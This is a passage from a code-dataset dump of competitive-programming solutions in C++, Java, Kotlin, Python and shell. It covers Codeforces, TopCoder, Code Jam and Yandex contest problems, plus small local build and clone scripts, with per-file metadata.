writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n// freopen(\"input.txt\", \"r\", stdin);\n int t;\n readln(t);\n for (int tt = 0; tt < t; tt++)\n {\n long long ans = 1;\n a.clear();\n char c;\n int count = 0;\n while (true)\n {\n scanf(\"%c\", &c);\n if (c == '\\n')\n break;\n if (c == '?')\n count++;\n a.push_back(c);\n }\n n = a.size() / 2;\n bool f = false;\n for (int i = 0; i < n; i++)\n {\n if (a[i] == a[i + n] && a[i] != '?')\n continue;\n if (a[i] != a[i + n] && a[i] != '?' && a[i + n] != '?')\n {\n ans = 1;\n f = true;\n break;\n }\n if (a[i] == '?' 
&& a[i + n] == '?')\n ans = (ans * 2) % INF,\n count--;\n }\n if (f)\n {\n for (int i = 0; i < count; i++)\n ans = (ans * 2) % INF;\n cout << ans << \"\\n\";\n continue;\n }\n for (int i = 0; i < count; i++)\n ans = (ans * 2) % INF;\n\n cout << ans - 1<< \"\\n\";\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.4621141254901886, "alphanum_fraction": 0.48900842666625977, "avg_line_length": 31.393939971923828, "blob_id": "46c139017131ac5ad8e24f0d3438b01ec5397a17", "content_id": "a8ab5c428c4ecb36b6de327bf8d555e38d4f693b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4276, "license_type": "no_license", "max_line_length": 174, "num_lines": 132, "path": "/2020/gcjQual/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(a.size())\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run(int n)\n{\n auto ask = [&](int i) {\n writeln(i + 1);\n cout.flush();\n ints(x);\n cerr << \"Asking \" << i + 1 << \", got \" << x << endl;\n return x;\n };\n string answer(n, '!');\n\n set<int> notAsked;\n fori(n / 2) notAsked.insert(i);\n\n vector<vector<int>> d(2, vector<int>(2, -1));\n for (int request = 0; !notAsked.empty(); request += 2)\n {\n cerr << answer << \" Request \" << request << endl;\n if (request % 10 == 0)\n {\n bool flipped = false;\n bool reversed = false;\n auto get = [&](int i, int j, int need) {\n request++;\n int x = d[i][j];\n int q = ask(x);\n return q != need;\n };\n if (d[0][0] != -1)\n flipped = get(0, 0, 0);\n else if (d[1][1] != -1)\n flipped = get(1, 1, 1);\n if (flipped)\n {\n for (char& c: answer)\n c ^= 1;\n swap(d[0][0], d[1][1]);\n swap(d[0][1], d[1][0]);\n }\n if (d[0][1] != -1)\n reversed = get(0, 1, 0);\n else if (d[1][0] != -1)\n reversed = get(1, 0, 1);\n if (reversed)\n {\n reverse(all(answer));\n swap(d[0][1], d[1][0]);\n }\n if (request % 2 == 1)\n request++,\n ask(0);\n cerr << flipped << \" \" << reversed << endl;\n cerr << answer << endl;\n }\n int x;\n do\n x = rand() % (n / 2);\n while (!notAsked.count(x));\n int q = ask(x);\n int w = ask(n - x - 1);\n answer[x] = q + '0';\n answer[n - x - 1] = w + '0';\n d[q][w] = x;\n notAsked.erase(x);\n notAsked.erase(n - x - 1);\n }\n\n writeln(answer);\n string verdict;\n readln(verdict);\n if (verdict == \"Y\")\n return;\n else\n exit(29);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t, b);\n fori(t) run(b);\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename 
enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.6341463327407837, "alphanum_fraction": 0.6546854972839355, "avg_line_length": 17.11627960205078, "blob_id": "41fec3f96eba317073e690c5929bb0d8b4359e32", "content_id": "ba7a20d1081a4bc9455bf776e540b3d63f83141e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 779, "license_type": "no_license", "max_line_length": 223, "num_lines": 43, "path": "/trains/ai/cpp-cgdk/runallmaps.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "name=\"MyStrategy\"\n\nif [ ! 
-f $name.cpp ]\nthen\n echo Unable to find $name.cpp > compilation.log\n exit 1\nfi\n\nrm -f $name\n\nfiles=\"\"\n\nfor i in *.cpp\ndo\n files=\"$files $i\"\ndone\n\nfor i in model/*.cpp\ndo\n files=\"$files $i\"\ndone\n\nfor i in csimplesocket/*.cpp\ndo\n files=\"$files $i\"\ndone\n\ng++ -std=c++11 -I/home/igorjan/206round/staff -static -fno-optimize-sibling-calls -fno-strict-aliasing -DONLINE_JUDGE -D_LINUX -lm -s -x c++ -O2 -Wall -Wno-unknown-pragmas -Ddebug=1 -Dvis=1 -o $name $files 2>compilation.log\n\nfor i in {0..13};\ndo\n cd runner\n mv local-runner.properties backup\n echo maps/map0$i\n cp maps/map0$i \"local-runner.properties\"\n ./local-runner.sh &\n sleep 2\n cd ..\n ./MyStrategy\n read\ndone\ncd runner\nmv backup local-runner.properties\n" }, { "alpha_fraction": 0.6558252573013306, "alphanum_fraction": 0.6650485396385193, "avg_line_length": 24.762500762939453, "blob_id": "69b4f03d1235509175cd1dc35d52908adb1f3195", "content_id": "3665dc817e1c751c4b2ec1ef91e6d4b4acdf6995", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2060, "license_type": "no_license", "max_line_length": 100, "num_lines": 80, "path": "/trash/tpproger/tpB.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.BufferedReader;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.io.PrintWriter;\nimport java.util.Calendar;\nimport java.util.HashMap;\nimport java.util.Map;\nimport java.util.StringTokenizer;\n\npublic class tpB {\n\n\tstatic BufferedReader bufferedReader;\n\tstatic StringTokenizer stringTokenizer;\n\tstatic PrintWriter out;\n\tstatic String task = \"a\";\n\n\tvoid writeln(Object o) {\n\t\tSystem.out.println(o);\n\t}\n\n\tvoid run() {\n\t\tint n = nextInt();\n\t\tMap<String, Integer> map = new HashMap<>();\n\t\tString city, time;\n\t\tint t;\n\t\tfor (int i = 0; i < n; i++) {\n\t\t\tcity = next();\n\t\t\ttime = next().substring(3);\n\t\t\tt = 
Integer.parseInt(time);\n\t\t\tmap.put(city, t);\n\t\t}\n\t\tString from, to, begin;\n\t\tint m = nextInt();\n\t\tfor (int i = 0; i < m; i++) {\n\t\t\tfrom = next();\n\t\t\tto = from.substring(from.indexOf('-') + 1);\n\t\t\tfrom = from.substring(0, from.indexOf('-'));\n\t\t\tbegin = next();\n\t\t\ttime = next();\n\t\t\tCalendar c = Calendar.getInstance();\n\t\t\tc.set(0, 0, 0, Integer.parseInt(begin.substring(0, 2)), Integer.parseInt(begin.substring(3)), 0);\n\t\t\tc.add(Calendar.HOUR, Integer.parseInt(time.substring(0, 2)) + map.get(to) - map.get(from));\n\t\t\tc.add(Calendar.MINUTE, Integer.parseInt(time.substring(3)));\n\t\t\twriteln(c.getTime().toString().substring(11, 16));\n\t\t}\n\t}\n\n\tint nextInt() {\n\t\treturn Integer.parseInt(next());\n\t}\n\n\tlong nextLong() {\n\t\treturn Long.parseLong(next());\n\t}\n\n\tString next() {\n\t\twhile (stringTokenizer == null || !stringTokenizer.hasMoreTokens()) {\n\t\t\tstringTokenizer = new StringTokenizer(nextLine());\n\t\t}\n\t\treturn stringTokenizer.nextToken();\n\t}\n\n\tString nextLine() {\n\t\ttry {\n\t\t\treturn bufferedReader.readLine();\n\t\t} catch (IOException err) {\n\t\t\treturn null;\n\t\t}\n\t}\n\n\tpublic static void main(String[] args) throws IOException {\n\t\tbufferedReader = new BufferedReader(new InputStreamReader(System.in));\n\t\tout = new PrintWriter(System.out);\n\t\t// bufferedReader = new BufferedReader(new FileReader(task + \".txt\"));\n\t\t// out = new PrintWriter(new File(task + \".out\"));\n\t\tnew tpB().run();\n\t\tout.close();\n\t\tbufferedReader.close();\n\t}\n}" }, { "alpha_fraction": 0.3663194477558136, "alphanum_fraction": 0.4019097089767456, "avg_line_length": 21.58823585510254, "blob_id": "6a9e1d9033850c0a5c80f806fc8577c033142d96", "content_id": "aa7986cc3e9bdbb3b0a45b01443cdb77dcd888f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1152, "license_type": "no_license", "max_line_length": 64, "num_lines": 51, "path": 
"/trains/neerc/neerc.ifmo.ru.train.2015.10.13/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import re\ns = input()\nok = s.find('0') == -1\n\ns = s.replace('-', '0')\nt = re.sub(r'\\d', 'd', s).split('|')\ns = s.replace(' ', '')\n\nok &= len(t) == 12 and t[0] == '' and t[-1] == ''\nt = t[1:-1]\ndic = ['dd', 'd/', 'X ']\nlast = ['dd', 'd/d', 'd/X', 'Xdd', 'Xd/', 'XXd', 'XXX']\n\nif ok:\n for i in range(9):\n ok &= len(t[i]) == 2 and t[i] in dic\nif ok:\n ok &= (len(t[-1]) == 2 or len(t[-1]) == 3) and t[-1] in last\n\nprev = 0\ncount = 0\nvalues = []\nfor i in range(len(s)):\n if s[i] == 'X':\n values.append(10)\n prev = 0\n elif s[i] == '/':\n values.append(58 - ord(s[i - 1]))\n prev = 0\n elif s[i] == '|':\n prev = 0\n else:\n values.append(ord(s[i]) - 48)\n if prev >= 1 and prev <= 9 and values[-1] + prev >= 10:\n ok = False\n prev = values[-1]\n\nans = sum(values)\nj = 0\nfor i in range(len(s)):\n if s[i] == '|':\n count += 1\n elif ok:\n if count <= 9:\n if s[i] == 'X':\n ans += values[j + 1] + values[j + 2]\n elif s[i] == '/':\n ans += values[j + 1]\n j += 1\n\nprint(\"YES\\n\" + str(ans) if ok else \"NO\")\n" }, { "alpha_fraction": 0.5428571701049805, "alphanum_fraction": 0.5657142996788025, "avg_line_length": 16.5, "blob_id": "4ad2a366979864bf5d7bf31bd6705ca77f85a9ee", "content_id": "3bd745ecf4bcfaff5d801c5219da6395ea9a2549", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 175, "license_type": "no_license", "max_line_length": 58, "num_lines": 10, "path": "/scripts/cloneRep.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nif [ -z \"$1\" ]; then\n echo \"Rep isn't set\";\n exit 1;\nfi\n\nsurname=$(findSurname.py \"$1\")\n\ngit clone \"$1\" \"$surname\" && cd \"$surname\" && buildHere.sh\n" }, { "alpha_fraction": 0.44569289684295654, "alphanum_fraction": 0.45205992460250854, "avg_line_length": 23.504587173461914, "blob_id": 
"006cbe2c9629fb192c826e1369f2d8f42e1479e3", "content_id": "58a6462d1501ef9170b15fd4b28a02c28ecf3892", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2670, "license_type": "no_license", "max_line_length": 81, "num_lines": 109, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.21/D.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*;\nimport java.util.*;\nimport java.math.BigInteger;\nimport java.util.Map.Entry;\nimport static java.lang.Math.*;\n \npublic class D {\n \n final static String task_name = \"defense\";\n \n void run() {\n \n int w = nextInt(), h = nextInt(), n = nextInt() + 2, ans = 0;\n int[] x = new int[n], y = new int[n];\n x[1] = w + 1;\n y[1] = h + 1;\n \n for (int i = 2; i < n; i++) {\n x[i] = nextInt();\n y[i] = nextInt();\n }\n \n Arrays.sort(x);\n Arrays.sort(y);\n \n for (int i = 1; i < n; i++) {\n int dx = x[i] - x[i - 1] - 1;\n for (int j = 1; dx > 0 && j < n; j++) {\n int dy = y[j] - y[j - 1] - 1;\n if (dx * dy > ans) {\n ans = dx * dy;\n }\n }\n }\n out.println(ans);\n }\n \n int[][] nextMatrix(int n, int m) {\n int[][] matrix = new int[n][m];\n for (int i = 0; i < n; i++)\n for (int j = 0; j < m; j++)\n matrix[i][j] = nextInt();\n return matrix;\n }\n \n String next() {\n while (!st.hasMoreTokens())\n st = new StringTokenizer(nextLine());\n return st.nextToken();\n }\n \n boolean hasNext() {\n while (!st.hasMoreTokens()) {\n String line = nextLine();\n if (line == null) {\n return false;\n }\n st = new StringTokenizer(line);\n }\n return true;\n }\n \n int[] nextArray(int n) {\n int[] array = new int[n];\n for (int i = 0; i < n; i++) {\n array[i] = nextInt();\n }\n return array;\n }\n \n int nextInt() {\n return Integer.parseInt(next());\n }\n \n long nextLong() {\n return Long.parseLong(next());\n }\n \n double nextDouble() {\n return Double.parseDouble(next());\n }\n \n String nextLine() {\n try {\n return in.readLine();\n } catch (IOException 
err) {\n return null;\n }\n }\n \n static PrintWriter out;\n static BufferedReader in;\n static StringTokenizer st = new StringTokenizer(\"\");\n static Random rnd = new Random();\n \n public static void main(String[] args) throws IOException {\n if (task_name == null) {\n in = new BufferedReader(new InputStreamReader(System.in));\n out = new PrintWriter(System.out);\n } else {\n in = new BufferedReader(new FileReader(new File(task_name + \".in\")));\n out = new PrintWriter(new FileWriter(new File(task_name + \".out\")));\n }\n \n new D().run();\n out.close();\n in.close();\n }\n}" }, { "alpha_fraction": 0.4354221820831299, "alphanum_fraction": 0.44983819127082825, "avg_line_length": 28.05128288269043, "blob_id": "af84568894905539cc21c9437afa0e16d2a6acf7", "content_id": "3419d7e60b29cbf5babeadee0a601291dfb6feb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 3399, "license_type": "no_license", "max_line_length": 102, "num_lines": 117, "path": "/CodeForce/1571/F.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.PrintWriter// {{{\nimport kotlin.math.*\nimport kotlin.collections.*// }}}\n\nprivate fun run() {\n val (n, m) = readln()\n var a = Array(n) { readln() }.withIndex().sortedWith(compareBy({ it.value[1] }, { -it.value[0] }))\n val ans = IntArray(n) { -1 }\n var prev = 1\n for (i in a.indices)\n if (a[i].value[1] == 1) {\n ans[a[i].index] = prev\n prev += a[i].value[0]\n }\n a = a.dropWhile { it.value[1] == 1 }\n val sum = a.sumOf { it.value[0] }\n val y = sum / 2 + 1\n if (sum > m)\n return writeln(-1)\n var pprev = prev + 1\n val dp = BooleanArray(y) { false }\n val par = IntArray(y) { -1 }\n dp[0] = true\n for (i in a.indices) {\n val x = a[i].value[0]\n\n for (j in y - 1 downTo 0)\n if (dp[j] and (j + x < y))\n if (!dp[j + x]) {\n dp[j + x] = true\n par[j + x] = i\n }\n }\n for (i in y - 1 downTo 0) {\n if (dp[i]) {\n if (i < sum - i) {\n val t = prev\n prev = 
pprev\n pprev = t\n }\n var p = i\n while (p > 0) {\n val index = par[p]\n ans[a[index].index] = prev\n prev += a[index].value[0] * 2\n p -= a[index].value[0]\n }\n\n for (j in a.indices)\n if (ans[a[j].index] == -1) {\n ans[a[j].index] = pprev\n pprev += a[j].value[0] * 2\n }\n return if (max(prev, pprev) > m + 2)\n writeln(-1)\n else\n writeln(ans.joinToString(\" \"))\n }\n }\n\n}\n\nprivate fun PrintWriter.readSolveWrite() {\n// val (t) = readln()\n repeat(1) {\n run()\n }\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate fun writeln(vararg strings: Any) =\n println(strings.map { if (it is IntArray) it.joinToString(\" \") else it }.joinToString(\" \"))\n\nprivate fun readln() = getIntArray()\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\nfun main() = bufferOut { readSolveWrite() }\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n @OptIn(kotlin.ExperimentalStdlibApi::class)\n val d = c.code - '0'.code\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.48453325033187866, "alphanum_fraction": 0.49384066462516785, "avg_line_length": 
18.226316452026367, "blob_id": "c19b7a8531889c15b6de577826a960749e545ad5", "content_id": "879b9573ef475cce051e794932df01ccd0ac37e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3653, "license_type": "no_license", "max_line_length": 163, "num_lines": 190, "path": "/CodeForce/0400/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a);void writeln(int a, int b); void writeln(int a, int b, int c); void writeln(int a, int b, int c, int d); void writeln(vector<int>& a);\nvoid readln(int& a);void readln(int& a, int& b);void readln(int& a, int& b, int& c);void readln(int& a, int& b, int& c, int& d);void readln(vector<int>& a, int n);\n\nstruct graph\n{\n vector<vector<int>> edges;\n int n;\n graph(int n);\n graph(int n, int m);\n graph();\n void createGraph(int n);\n void add_edge(int u, int v);\n void add_or_edge(int u, int v);\n void writelnMatrix();\n void writeln();\n};\n\nint n, m, k, x, y, p, z;\nvi a;\n\nvoid run()\n{\n readln(n, m, x, y);\n readln(z, p);\n x %= 4;\n y %= 2;\n z %= 4;\n int t, e;\n vector<pii> a;\n fori(p)\n readln(t, e),\n a.pb({t, e});\n fori(p)\n forj(x)\n a[i] = {a[i].second, (j % 2 == 0 ? 
n : m) - a[i].first + 1};\n if (x % 2)\n swap(n, m);\n if (y)\n fori(p)\n a[i] = {a[i].first, m - a[i].second + 1};\n fori(p)\n forj(z)\n a[i] = {(j % 2 == 0 ? m : n) - a[i].second + 1, a[i].first};\n fori(p)\n writeln(a[i].first, a[i].second);\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n\ngraph::graph(int n)\n{\n this->n = n;\n edges.resize(n);\n int t;\n fori(n)\n {\n edges[i].resize(n);\n forj(n)\n readln(t),\n edges[i][j] = t == '1';\n }\n}\n\ngraph::graph(int n, int m)\n{\n this->n = n;\n edges.resize(n);\n int u, v;\n fori(m)\n readln(u, v),\n add_edge(u - 1, v - 1);\n}\n\nvoid graph::add_edge(int u, int v)\n{\n edges[u].pb(v);\n}\n\nvoid graph::add_or_edge(int u, int v)\n{\n edges[u].pb(v);\n edges[v].pb(u);\n}\n\ngraph::graph(){};\n\nvoid graph::createGraph(int n)\n{\n edges.resize(n);\n}\n\nvoid graph::writeln()\n{\n fori(n)\n forj(edges[i].size())\n ::writeln(i, edges[i][j]);\n}\n\nvoid graph::writelnMatrix()\n{\n fori(n)\n {\n forj(n)\n printf(\"%d \", edges[i][j]);\n printf(\"\\n\");\n }\n}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n readln(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? 
'\\n' : ' ');\n}\n\nvoid writeln(int a)\n{\n printf(\"%d\\n\", a);\n}\n\nvoid writeln(int a, int b)\n{\n printf(\"%d %d\\n\", a, b);\n}\n\nvoid writeln(int a, int b, int c)\n{\n printf(\"%d %d %d\\n\", a, b, c);\n}\n\nvoid writeln(int a, int b, int c, int d)\n{\n printf(\"%d %d %d %d\\n\", a, b, c, d);\n}\n\nvoid readln(int &a)\n{\n scanf(\"%d\", &a);\n}\n\nvoid readln(int &a, int &b)\n{\n scanf(\"%d %d\", &a, &b);\n}\n\nvoid readln(int &a, int &b, int &c)\n{\n scanf(\"%d %d %d\", &a, &b, &c);\n}\n\nvoid readln(int &a, int &b, int &c, int &d)\n{\n scanf(\"%d %d %d %d\", &a, &b, &c, &d);\n}\n" }, { "alpha_fraction": 0.3859747648239136, "alphanum_fraction": 0.4238429069519043, "avg_line_length": 31.67889976501465, "blob_id": "24f5b6ebd4b05f2b7a381d6ac7472c0e7de64f77", "content_id": "a830a1586dd08c387c86440f8307f5468cfd60d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3565, "license_type": "no_license", "max_line_length": 144, "num_lines": 109, "path": "/2021/yandexBackendQual/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import requests\n\na = []\nfor i in range(4):\n a.append(input())\n\ndef get(names):\n return requests.request('MEW', 'http://127.0.0.1:7777/', headers={'X-Cat-Variable': ','.join(names)}).headers.get('X-Cat-Value').split(', ')\n\nvalues = []\n\nthree = get(a[:-1])\ns = set(three)\nif len(s) == 1: #000\n fourth = get([a[3]])[0]\n values = [three[0], three[1], three[2], fourth]\nelif len(s) == 3:#012\n zero, one, two = three\n ad = get([a[0], a[3]])\n if ad[0] == ad[1]:\n if ad[0] == zero:\n if get([a[1]])[0] == one:\n values = [zero, one, two, zero]\n else:\n values = [zero, two, one, zero]\n elif ad[0] == one:\n if get([a[1]])[0] == zero:\n values = [one, zero, two, one]\n else:\n values = [one, two, zero, one]\n else:\n if get([a[1]])[0] == one:\n values = [two, one, zero, two]\n else:\n values = [two, zero, one, two]\n elif ad[0] == zero and ad[1] == one:\n cd = 
get([a[2], a[3]])\n if cd[0] == cd[1] and cd[0] == zero:\n values = [one, two, zero, zero]\n elif cd[0] == cd[1] and cd[0] == one:\n values = [zero, two, one, one]\n elif cd[0] == one:\n values = [zero, one, two, one]\n else:\n values = [one, zero, two, zero]\n elif ad[0] == zero and ad[1] == two:\n cd = get([a[2], a[3]])\n if cd[0] == cd[1] and cd[0] == zero:\n values = [two, one, zero, zero]\n elif cd[0] == cd[1] and cd[0] == two:\n values = [zero, one, two, two]\n elif cd[0] == zero:\n values = [two, zero, one, zero]\n else:\n values = [zero, two, one, two]\n elif ad[0] == one and ad[1] == two:\n cd = get([a[2], a[3]])\n if cd[0] == cd[1] and cd[0] == one:\n values = [two, zero, one, one]\n elif cd[0] == cd[1] and cd[0] == two:\n values = [one, zero, two, two]\n elif cd[1] == one:\n values = [two, one, zero, one]\n else:\n values = [one, two, zero, two]\n else:\n first = ad[0] if ad[0] in s else ad[1]\n forth = ad[1] if ad[0] in s else ad[0]\n s.remove(first)\n second = get([a[1]])[0]\n s.remove(second)\n third = s.pop()\n values = [first, second, third, forth]\n\n\nelse:#001\n zero = three[1]\n one = three[2] if three[0] == three[1] else three[0]\n tf = get([a[2], a[3]])\n if tf[0] == tf[1]:#001 + ??yy\n if tf[0] == zero:#??00\n if get([a[0]])[0] == one:#1000\n values = [one, zero, zero, zero]\n else:#0100\n values = [zero, one, zero, zero]\n else:#0011\n values = [zero, zero, one, one]\n else:\n if set(tf) == s:#??01\n ad = get([a[0], a[3]])\n if ad[0] == ad[1] and ad[0] == zero:\n values = [zero, zero, one, zero]\n elif ad[0] == ad[1] and ad[1] == one:\n values = [one, zero, zero, one]\n else:\n values = [zero, one, zero, one]\n else:#??(0/1)2\n third = tf[0] if tf[0] in s else tf[1]\n forth = tf[1] if tf[0] in s else tf[0]\n if third == one:#??12\n values = [zero, zero, third, forth]\n else:#??02\n if get([a[0]])[0] == zero:\n values = [zero, one, zero, forth]\n else:\n values = [one, zero, zero, forth]\n\n\nprint(*values, sep='\\n')\n\n\n\n" }, { 
"alpha_fraction": 0.3158508241176605, "alphanum_fraction": 0.3426573574542999, "avg_line_length": 22.83333396911621, "blob_id": "e750962dfade8655edeb7504ff6f1eebdf8971ba", "content_id": "46f7c3a966d1fd6fa47121a13885ce0f756c38f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 858, "license_type": "no_license", "max_line_length": 50, "num_lines": 36, "path": "/TopCoder/TC655/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define fori(n) for(int i = 0; i < (int) (n); i++)\n#define forj(n) for(int j = 0; j < (int) (n); j++)\n#define INF 1000000007\n\nusing namespace std;\n\nclass FoldingPaper2 \n{\npublic:\n int solve(int w, int h, int A) \n {\n auto f = [](int i, int j, int w, int h){\n int ans = 0;\n if (w < i || h < j)\n return INF;\n while (i * 2 <= w)\n w = (w + 1) / 2,\n ans++;\n while (j * 2 <= h)\n h = (h + 1) / 2,\n ans++;\n if (i < w)\n ans++;\n if (j < h)\n ans++;\n return ans;\n };\n int ans = INF;\n fori(A + 1)\n if (i && (A % i == 0))\n ans = min(ans, f(A / i, i, w, h));\n return ans == INF ? 
